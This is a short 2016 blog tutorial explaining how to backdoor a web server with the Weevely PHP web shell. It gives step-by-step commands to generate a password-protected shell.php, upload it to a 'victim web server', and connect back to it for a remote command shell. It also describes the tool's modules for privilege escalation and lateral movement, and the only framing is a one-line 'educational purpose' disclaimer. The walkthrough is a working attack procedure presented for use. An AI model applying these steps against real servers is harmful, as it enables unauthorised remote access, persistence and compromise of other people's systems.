Sunday, 6 November 2016

Backdoor A Web Server Using Weevely

Backdoor A Web Server Using Weevely

Today's tutorial is about backdooring a web server using weevely. Weevely gives you the command line interface to the attacker where attacker can easily compile and execute root exploits. This tool is very helpful when you don't have any option to port forward. 

What is Weevely

Weevely is a command line web shell dynamically extended over the network at runtime, designed or remote server administration and penetration testing.
Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environment.

How Weevely Works 

  • First we create weevely backdoor file.
  • Then we upload it to web server.
  • After that execute the file and access the command line interface from weevely.

Follow these steps to backdoor a web server using Weevely

1. Install weevely from github. I am using Parrot OS it comes pre installed with weevely.
2. After installing open weevely using the following command.
sudo weevely
3. Now we need to generate the backdoored php file, use the following command to do that.
weevely generate samplepasswd /home/uname/Desktop/shell.php
4. Now upload generated file to your victim web server and visit the location URL to execute it. Example
 5. After successful execution we need to open weevely again to access the command shell. Use the following commands to do that.
weevely http://www.exampleserver.com/shell.php samplepasswd
6. Now you can easily access the command line shell.


This is only for educational prupose.

1 comment:

Share your problems but don't spam here